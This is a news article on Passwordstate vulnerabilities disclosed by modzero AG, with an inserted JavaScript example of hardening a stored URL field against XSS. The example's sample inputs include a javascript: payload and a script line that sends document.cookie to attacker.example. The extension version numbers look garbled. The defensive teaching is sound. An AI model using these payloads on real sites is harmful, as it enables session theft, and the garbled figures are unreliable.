Multiple high-severity vulnerabilities have been disclosed in the Passwordstate password management solution that could be exploited by an unauthenticated remote adversary to obtain a user's plaintext passwords.
"Successful exploitation allows an unauthenticated attacker to exfiltrate passwords from an instance, overwrite all stored passwords within the database, or elevate their privileges within the application," Swiss cybersecurity firm modzero AG said in a report published this week.
"Some of the individual vulnerabilities can be chained to obtain a shell on the Passwordstate host system and dump all stored passwords in cleartext, starting with nothing more than a valid username."
Passwordstate, developed by an Australian company named Click Studios, has over 29,000 customers and is used by more than 370,000 IT professionals.
One of the flaws also affects Passwordstate version 126.96.36.199 for the Chrome web browser. The latest version of the browser add-on is 188.8.131.52, which was released on September 7, 2022.
The list of vulnerabilities identified by modzero AG is below –
- CVE-2022-3875 (CVSS score: 9.1) – An authentication bypass for Passwordstate's API
- CVE-2022-3876 (CVSS score: 6.5) – A bypass of access controls through user-controlled keys
- CVE-2022-3877 (CVSS score: 5.7) – A stored cross-site scripting (XSS) vulnerability in the URL field of every password entry
- No CVE (CVSS score: 6.0) – An insufficient mechanism for securing passwords by using server-side symmetric encryption
- No CVE (CVSS score: 5.3) – Use of hard-coded credentials to list audited events such as password requests and user account changes via the API
- No CVE (CVSS score: 4.3) – Use of insufficiently protected credentials for Password Lists
Exploiting the vulnerabilities could allow an attacker with knowledge of a valid username to extract stored passwords in cleartext, overwrite the passwords in the database, and even elevate privileges to achieve remote code execution.
What's more, an improper authorization flaw (CVSS score: 3.7) found in the Chrome browser extension could be weaponized to send all passwords to an actor-controlled domain.
In an attack chain demonstrated by modzero AG, a threat actor could forge an API token for an administrator account and exploit the XSS flaw to add a malicious password entry, obtain a reverse shell, and retrieve the passwords hosted in the instance.
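The stored XSS in the URL field is the pivot of the chain above. The report summarised here does not spell out the injection path, so the following is an added, illustrative example (not Passwordstate's code and not modzero's proof of concept) of the most common way a "URL" field becomes a stored-XSS sink: the saved value is dropped straight into a link's href and text. It contrasts that unsafe rendering with a hardened version that allow-lists the scheme and HTML-escapes the value; the function names and the `javascript:` payload are assumptions for the demonstration.

```javascript
// Added example: hardening a stored "URL" field against stored XSS.
// Illustrative code, not Passwordstate's. Assumes the classic failure mode
// (stored value rendered as-is into an <a> href and its text); the advisory
// summarised above does not describe the product's actual injection path.

const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Returns a normalised, safe href string, or null if the value must be rejected.
function sanitizeUrlField(value) {
  if (typeof value !== "string") return null;
  const trimmed = value.trim();
  if (trimmed.length === 0 || trimmed.length > 2048) return null;
  let parsed;
  try {
    parsed = new URL(trimmed); // throws on relative or malformed input
  } catch {
    return null;
  }
  // URL lowercases the scheme and strips embedded tabs/newlines, so
  // "JavaScript:" and "java\nscript:" both land here as "javascript:".
  if (!ALLOWED_SCHEMES.has(parsed.protocol)) return null; // blocks javascript:, data:, vbscript:, file:
  return parsed.href; // the parser also percent-encodes quotes and angle brackets in the path
}

// HTML-escape for text and double-quoted attribute contexts.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable rendering: what a template that trusts the stored value does.
function renderLinkUnsafe(value) {
  return `<a href="${value}">${value}</a>`;
}

// Hardened rendering: validate the scheme first, then escape for both contexts.
function renderLinkSafe(value) {
  const href = sanitizeUrlField(value);
  if (href === null) return "<span>(invalid URL)</span>";
  return `<a href="${escapeHtml(href)}" rel="noopener noreferrer">${escapeHtml(href)}</a>`;
}

// Constructed sample entries: one benign, one scheme-based payload, one attribute-breaking payload.
const SAMPLE_URL_VALUES = [
  "https://intranet.example.internal/login",
  "JavaScript:alert(document.cookie)",
  'https://example.com/"><script>fetch("https://attacker.example/?c="+document.cookie)</script>',
];

// Runs both renderers over the samples; returns [unsafeHtml, safeHtml] pairs for inspection.
function compareRenderings(values = SAMPLE_URL_VALUES) {
  return values.map((v) => [renderLinkUnsafe(v), renderLinkSafe(v)]);
}

if (typeof require !== "undefined" && require.main === module) {
  for (const [unsafe, safe] of compareRenderings()) {
    console.log("UNSAFE:", unsafe);
    console.log("SAFE:  ", safe);
  }
}
```

Note that scheme allow-listing and output encoding are complementary: escaping alone would not stop a `javascript:` href, and allow-listing alone would not stop a quote-and-angle-bracket payload from breaking out of the attribute if the parser did not encode it.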
Users are recommended to update to Passwordstate 9.6 – Build 9653, released on November 7, 2022, or later versions to mitigate the potential threats.
Passwordstate, in April 2021, fell victim to a supply chain attack that allowed the attackers to leverage the service's update mechanism to drop a backdoor on customers' devices.